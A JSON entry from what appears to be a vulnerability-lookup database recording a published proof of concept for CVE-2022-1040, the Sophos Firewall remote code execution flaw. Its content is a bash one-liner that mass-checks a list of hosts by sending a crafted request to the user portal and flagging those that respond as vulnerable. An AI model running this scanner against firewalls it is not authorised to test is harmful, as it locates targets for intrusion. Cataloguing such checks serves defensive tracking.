{"uuid": "6b9bf0b7-fb9e-42b6-b720-af8a3bf7d669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-1040", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9490", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Sophos Firewall CVE-2022-1040 (RCE) One-liner mass checker.\n\nSophos Firewall CVE-2022-1040 (RCE) one-liner mass checker.\nREF: https://attackerkb.com/topics/cdXl2NL3cR/cve-2022-1040\n\ncat sophos_servers | while read host do; do curl --connect-timeout 10 -ks -H \"X-Requested-With: XMLHttpRequest\" -X POST \"https://$host/userportal/Controller?mode=8700&amp;operation=1&amp;datagrid=179&amp;json=\\{\"\ud83d\udc7d\":\"TEST\"\\}\" | grep -q 'Session Expired' &amp;&amp; printf \"$host \\033[1;41mVulnerable a CVE-2022-1040 (Sophos RCE)\\e[0m\\n\"; done; \n\nhttps://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker", "creation_timestamp": "2022-05-09T14:49:53.000000Z"}